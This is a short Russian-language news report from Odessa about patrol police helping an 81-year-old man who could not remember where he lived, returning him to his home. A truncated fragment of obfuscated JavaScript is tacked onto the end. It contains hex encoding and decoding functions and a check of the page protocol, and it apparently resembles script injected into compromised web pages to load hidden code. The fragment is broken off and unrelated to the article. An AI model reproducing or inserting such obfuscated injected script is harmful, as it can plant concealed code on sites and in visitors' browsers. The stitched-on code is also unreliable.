В Одессе помогли 81-летнему мужчине, который не мог вспомнить, где живет «фото»

В Одессе помогли 81-летнему мужчине, который не мог вспомнить, где живет

 

Screenshot_23

Как сообщает корреспондент Украинской Службы Информации со ссылкой на пресс-службу патрульной полиции Одессы, инцидент произошел 10 мая около 22 часов.

На Французском бульваре одессит увидел пожилого мужчину, который вел себя беспокойно и не мог вспомнить, где живет. При разговоре, заявил, что живет на улице Екатерининской. Мужчина отвез его по указанному адресу, но, как выяснилось, потерявшийся не проживает там более 20 лет. Инспекторы установили, что пожилой мужчина живет на улице Ильфа и Петрова и вернули его домой. Обеспокоенные родственники в это время безуспешно разыскивали мужчину в Киевском районе.

В патрульной полиции напомнили, что если в семье есть пожилые родственники, которые время от времени теряют память, нужно стараться не оставлять их без присмотра. В ведомстве привели шокирующую статистику, согласно которой ежегодно в Украине у 5 тыс. пенсионеров замедляются процессы мышления и теряется память.

Как сообщала USIonline.com, на Аллее славы боец Нацгвардии оказал первую медпомощь пожилому мужчине.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e